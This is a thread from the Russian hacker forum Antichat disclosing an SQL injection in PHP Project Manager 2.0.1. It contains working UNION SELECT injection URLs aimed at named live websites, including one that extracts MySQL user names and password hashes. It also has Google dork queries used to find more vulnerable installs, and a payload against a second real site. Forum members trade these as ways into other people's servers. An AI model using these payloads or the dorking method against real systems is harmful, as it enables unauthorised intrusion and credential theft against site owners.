Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   sql inj PHP Project Manager => 2.0.1 (https://forum.antichat.xyz/showthread.php?t=36184)

BlackCats 23.03.2007 13:09
sql inj PHP Project Manager => 2.0.1
 
изначально уязвимость предполагалось для того чтобы меня взяли в моа, но т.к. меня послали - я её выкладываю.

PHP Project Manager
версия => 2.0.1
описание:
Уязвимость существует в сценарии indexproject.php из-за недостаточной обработки входных данных.
пример:
Код:
http://www.ia.unc.edu/dev/manager/indexproject.php?id=-35+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35/*
на секлабе баги нету(ну и вроде в др местах тоже)

Spyder 23.03.2007 13:25
хэк=)

Colkru 23.03.2007 22:08
Молодец, правда скрипт не популярен, не думаю что в МОА было бы комуто интересно...
:)

Rebz 23.03.2007 22:16
и это все??? нда, коварно..
я думал ты хоть подобрал названия таблиц..

BlackCats 23.03.2007 22:21
Цитата:
Сообщение от Rebz
и это все??? нда, коварно..
я думал ты хоть подобрал названия таблиц..
зачем? я же просто привёл пример.. и только-то..

n1†R0x 23.03.2007 22:23
мде =\
Код:
http://www.ia.unc.edu/dev/manager/indexproject.php?id=-35+union+select+1,concat(user,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+mysql.user/*
это в sqlz можно..
:)

BlackCats 25.03.2007 11:15
Цитата:
Сообщение от n1†R0x
мде =\
Код:
http://www.ia.unc.edu/dev/manager/indexproject.php?id=-35+union+select+1,concat(user,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+mysql.user/*
это в sqlz можно..
:)
понимаеш в чём разница.. когда скуля на самописном сайте - это одно, а когда в движке, это другое.

n1†R0x 25.03.2007 11:20
Цитата:
Сообщение от \6/
понимаеш в чём разница.. когда скуля на самописном сайте - это одно, а когда в движке, это другое.
порой самописные сайты бывают лучше защищены, чем средние Cms.
я понял твою мысль..

BlackCats 25.03.2007 12:34
ну вот и хорошо :)
следующий..

-=lebed=- 25.03.2007 12:47
Цитата:
следующий..
я ;)

Строка для поиска в гугл: inurl:indexproject.php?id

Мдя, не густо:
Код:
http://www.google.ru/search?hl=ru&q=inurl%3Aindexproject.php%3Fid&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%B2+Google&lr=
и так тоже:
Код:
http://www.google.ru/search?hl=ru&newwindow=1&q=%22PHP+Project+Manager+2.0.1%22&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA&lr=
Ну да, скуль есть:
Код:
http://www.nuevoparadigma.com/proyectos/indexproject.php?id=-1+union+select+1,version(),3,4,user(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/*
Цитата:
PHP Project Manager 2.0.1 © 2004 - www.jomier.com
тока двиг не популярный...


Время: 04:19
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице